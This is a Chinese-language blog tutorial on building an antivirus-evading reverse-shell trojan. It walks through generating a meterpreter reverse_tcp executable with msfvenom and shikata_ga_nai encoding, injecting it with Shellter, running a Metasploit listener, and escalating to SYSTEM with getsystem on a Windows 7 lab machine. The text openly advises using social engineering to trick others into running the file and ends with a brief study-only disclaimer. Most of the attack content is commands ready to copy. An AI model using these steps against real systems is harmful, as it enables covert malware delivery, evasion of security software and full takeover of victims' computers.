msf反彈木馬之免殺

原理

利用msf模塊中的msfvenom模塊,首先生成.exe木馬文件,用靶機打開,攻擊成功後,就滲透到了靶機系統中。

準備

win7靶機 ip :192.168.56.130
kali攻擊機 ip: 192.168.56.135

##實戰開始
1.打開kali機,在命令行輸入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe

LHOST是主機的ip,用來“提醒”木馬成功後應該返回信息給自己的主機。
lport是返回時連接的端口號,需要開啓tcp功能,1234端口好像默認開啓?
> 後面的那一串表示木馬生成的對應地址,爲了方便操作我直接生成在桌面上。
-e x86/shikata_ga_nai 爲使用shikata_ga_nai的編碼方式對攻擊載荷進行重新編碼
-i 5爲使用剛纔設定的編碼方式對目標進行5次編碼

2.命令行輸入

shellter

第一個選項選擇Aimage.png

3.PE Target 後面填寫/home/kali/Desktop/1.exe,即木馬所在路徑。
然後等待一段時間······
image.png
注意,雖然看着不動,但是上面那個數字一直在跳,所以不是你卡住了~

4.然後選擇Yimage.png

5.選擇L,payload index 選擇1image.png

6.設置LHOST以及LPORTimage.png

等個大概2秒鐘,就結束了~
免殺木馬製作完成。
命令行輸入

msfconsole

進入metasploit。
然後輸入

use exploit/multi/handler

開啓監聽模式
接下來就是設置參數了,可以使用option命令來查看需要設置的參數。主要設置三個:payload、LHOST、LPORT,需要跟木馬一樣,複製一下就行

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.135
set lport 1234

這裏大小寫隨意,都可以被識別。
隨後輸入

exploit

執行監聽命令,也就是攻擊開始~

kali端操作結束!

然後利用社會工程學等方式誘騙其他人點擊這玩意,就被攻擊了。

現在假裝win7被騙了,無意中點了我的反彈木馬:
image.png

然後輸入

shell

就可以獲取對方管理員權限。
在輸入shell之前,輸入getsystem,獲得system權限以後,再輸入shell就可以獲得最高權限啦~
image.png
使用echo %username%可以輸出使用者的名字,這裏是SJX-PC$,如果是管理員的話,只會顯示管理員賬號(我這裏是“sjx”),而且,看前面的內容也可以知道是system權限:image.png


本篇文章僅供學習使用,讀者請勿隨意對他人電腦進行操作。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章